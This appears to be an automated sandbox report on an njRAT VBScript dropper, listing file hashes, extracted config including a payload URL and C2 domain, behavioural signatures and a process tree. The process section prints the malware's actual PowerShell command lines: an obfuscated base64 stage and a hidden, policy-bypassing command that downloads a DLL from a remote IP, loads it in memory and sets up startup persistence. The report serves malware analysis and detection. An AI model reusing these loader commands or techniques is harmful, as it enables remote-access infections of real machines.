Analysis

max time kernel: 147s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/09/2022, 19:12

Static task: static1
Behavioral task: behavioral1
Sample: 7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
Resource: win7-20220812-en
General

Target: 7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
Size: 205KB
MD5: 55f65c5be5331616022acfa14b13cf0d
SHA1: 5715298639b8fa40e9621a9a1e5f4e12feb801ab
SHA256: 7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab
SHA512: eaa7b7cea085d6703ad604cef958426b05da22930e451f65676b0f57631e0c7328ec089b8480debc41c2ecefddd8a7e173c4f9acce5baea72476fa983f934153
SSDEEP: 96:W6Ww7isRFEDD7174KWOktsKFSG4qYk/uU95coQ18HE:l/FEDHxIBKoTjcX18k
Malware Config

Extracted
URL: http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt

Extracted
Family: njrat
Version: 0.7NC
Botnet: NYAN CAT
C2: nyas22.duckdns.org:57831
Mutex: 8521e1f80fc24
reg_key: 8521e1f80fc24
splitter: @!#&^%$
Signatures

Blocklisted process makes network request (1 IoC)
  flow 13 | pid 4896 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | WScript.exe

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs | powershell.exe
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs | powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  PID 4896 set thread context of 1320 | pid 4896 | powershell.exe | procid_target 87

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 2724 | powershell.exe (2 entries)
  pid 4896 | powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (33 IoCs)
  Token: SeDebugPrivilege | pid 2724 | powershell.exe
  Token: SeDebugPrivilege | pid 4896 | powershell.exe
  Token: SeDebugPrivilege | pid 1320 | RegSvcs.exe
  Token: 33 and Token: SeIncBasePriorityPrivilege, alternating | pid 1320 | RegSvcs.exe (15 pairs, 30 entries)

Suspicious use of WriteProcessMemory (12 IoCs)
  PID 1980 wrote to memory of 2724 | pid 1980 | WScript.exe | procid_target 83 (2 entries)
  PID 2724 wrote to memory of 4896 | pid 2724 | powershell.exe | procid_target 85 (2 entries)
  PID 4896 wrote to memory of 1320 | pid 4896 | powershell.exe | procid_target 87 (8 entries)
Processes

C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 1980
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBRAFcARQBSAFQAWQAvAEMA⌚⌚⌚gB⌚⌚⌚AFoALwBEAGwAbABmADMALgB0AHgAdAAnACkAKQA7AFsA⌚⌚⌚wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⌚⌚⌚ARwBsAHkAbQB6AF⌚⌚⌚AZwAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcAVQBEAHMA⌚⌚⌚wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMgBYAFoALwB3AG⌚⌚⌚AbgAvAHQAcwBlAHQALwA5ADQALgA5ADEALgAxADQAMgAuADEAOQAvAC8AOgBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwB3AG⌚⌚⌚AZAAzADcAMwBrAE4ASABpAGgAZgBvADkAMAA4ADMANwA4ACYAJAAhACIAIwAkAC⌚⌚⌚AJgB1AGgAaABqAGYAbgA3AHcAZAAnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2724
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.2XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , 'wed373kNHihfo908378&$!"#$%&uhhjfn7wd' ))"3⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 4896
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (depth 4)
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  - Suspicious use of AdjustPrivilegeToken
  PID: 1320
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 3KB
MD5: f41839a3fe2888c8b3050197bc9a0a05
SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Filesize: 64B
MD5: a6c9d692ed2826ecb12c09356e69cc09
SHA1: def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256: a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512: 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3